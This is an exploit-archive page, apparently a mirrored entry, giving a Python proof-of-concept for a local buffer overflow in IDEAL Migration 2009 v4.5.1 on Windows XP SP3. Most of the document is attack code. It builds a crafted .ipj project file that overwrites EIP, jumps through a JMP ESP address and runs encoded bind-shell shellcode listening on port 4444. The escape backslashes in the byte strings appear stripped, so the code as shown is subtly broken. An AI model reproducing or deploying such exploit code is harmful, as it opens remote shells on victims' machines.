[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : IDEAL Migration 2009 v4.5.1 Local Buffer Overflow Exploit
# Published : 2010-04-26
# Author : Dr_IDE
# Previous Title : IDEAL Administration 2010 v10.2 Local Buffer Overflow Exploit
# Next Title : Easyzip 2000 v3.5 (.zip) 0day stack buffer overflow PoC exploit
#!/usr/bin/env python
#################################################################
#
# IDEAL Migration 2009 v4.5.1 Local Buffer Overflow Exploit
# Found By: Dr_IDE
# Usage: Right Click First Element in tree -> Open Migration Project -> Bind Shell
# Download: www.pointdev.com
# Tested On: Windows XPSP3
#
#################################################################
# windows/shell_bind_tcp - 696 bytes Encoder: x86/alpha_mixed
# EXITFUNC=seh, LPORT=4444
sc = (
"x89xe2xdbxccxd9x72xf4x5fx57x59x49x49x49x49x49"
"x49x49x49x49x49x43x43x43x43x43x43x37x51x5ax6a"
"x41x58x50x30x41x30x41x6bx41x41x51x32x41x42x32"
"x42x42x30x42x42x41x42x58x50x38x41x42x75x4ax49"
"x4bx4cx42x4ax4ax4bx50x4dx4bx58x4bx49x4bx4fx4b"
"x4fx4bx4fx43x50x4cx4bx42x4cx51x34x46x44x4cx4b"
"x50x45x47x4cx4cx4bx43x4cx43x35x44x38x43x31x4a"
"x4fx4cx4bx50x4fx42x38x4cx4bx51x4fx51x30x45x51"
"x4ax4bx50x49x4cx4bx47x44x4cx4bx45x51x4ax4ex50"
"x31x49x50x4ax39x4ex4cx4bx34x49x50x44x34x43x37"
"x49x51x49x5ax44x4dx45x51x48x42x4ax4bx4cx34x47"
"x4bx50x54x46x44x46x48x44x35x4bx55x4cx4bx51x4f"
"x46x44x43x31x4ax4bx43x56x4cx4bx44x4cx50x4bx4c"
"x4bx51x4fx45x4cx43x31x4ax4bx44x43x46x4cx4cx4b"
"x4dx59x42x4cx47x54x45x4cx43x51x49x53x50x31x49"
"x4bx43x54x4cx4bx47x33x46x50x4cx4bx47x30x44x4c"
"x4cx4bx42x50x45x4cx4ex4dx4cx4bx47x30x43x38x51"
"x4ex45x38x4cx4ex50x4ex44x4ex4ax4cx46x30x4bx4f"
"x4ex36x45x36x46x33x43x56x45x38x47x43x46x52x42"
"x48x43x47x42x53x46x52x51x4fx50x54x4bx4fx48x50"
"x42x48x48x4bx4ax4dx4bx4cx47x4bx46x30x4bx4fx48"
"x56x51x4fx4dx59x4bx55x45x36x4bx31x4ax4dx43x38"
"x45x52x46x35x43x5ax45x52x4bx4fx48x50x45x38x49"
"x49x44x49x4ax55x4ex4dx51x47x4bx4fx48x56x51x43"
"x51x43x51x43x51x43x46x33x51x53x50x53x47x33x51"
"x43x4bx4fx4ex30x42x46x43x58x42x31x51x4cx45x36"
"x46x33x4bx39x4dx31x4cx55x45x38x4ex44x44x5ax42"
"x50x49x57x50x57x4bx4fx49x46x42x4ax44x50x50x51"
"x50x55x4bx4fx48x50x45x38x49x34x4ex4dx46x4ex4a"
"x49x46x37x4bx4fx4ex36x50x53x46x35x4bx4fx48x50"
"x43x58x4bx55x47x39x4cx46x50x49x46x37x4bx4fx48"
"x56x46x30x50x54x50x54x46x35x4bx4fx4ex30x4cx53"
"x42x48x4bx57x44x39x48x46x44x39x50x57x4bx4fx48"
"x56x51x45x4bx4fx4ex30x42x46x43x5ax42x44x42x46"
"x43x58x43x53x42x4dx4cx49x4bx55x43x5ax46x30x51"
"x49x51x39x48x4cx4dx59x4dx37x42x4ax51x54x4bx39"
"x4ax42x50x31x49x50x4ax53x4ex4ax4bx4ex50x42x46"
"x4dx4bx4ex50x42x46x4cx4ax33x4cx4dx43x4ax47x48"
"x4ex4bx4ex4bx4ex4bx45x38x42x52x4bx4ex4ex53x42"
"x36x4bx4fx42x55x47x34x4bx4fx49x46x51x4bx50x57"
"x51x42x50x51x46x31x50x51x43x5ax43x31x50x51x50"
"x51x51x45x50x51x4bx4fx48x50x42x48x4ex4dx48x59"
"x45x55x48x4ex50x53x4bx4fx49x46x42x4ax4bx4fx4b"
"x4fx47x47x4bx4fx4ex30x4cx4bx51x47x4bx4cx4bx33"
"x48x44x45x34x4bx4fx49x46x50x52x4bx4fx4ex30x45"
"x38x4ax50x4dx5ax43x34x51x4fx51x43x4bx4fx4ex36"
"x4bx4fx4ex30x41x41")
head = ("x0Dx0Ax5Bx47x72x6Fx75x70x2Cx45x78x70x6F"
"x72x74x2Cx59x65x73x5Dx0Dx0A"); # Project Header
buff = ("x43x6fx6dx70x75x74x65x72x3D" + "x41" * 2420); # XPSP3 EIP Overwrite
foot = ("x0Dx0Ax5Bx45x6Ex64x5Dx0Dx0A"); # File Footer
retn = ("x2Fx1DxF3x77"); # JMP ESP
nops = ("x90" * 16);
try:
print "[*] Generating Evil Migrate File..."
f1 = open("unIDEAL2010.ipj","w");
f1.write(head + buff + retn + nops + sc + foot);
f1.close();
print "[*] File created successfully!"
except:
print "[-] There was a problem writing the file."
#[pocoftheday.blogspot.com]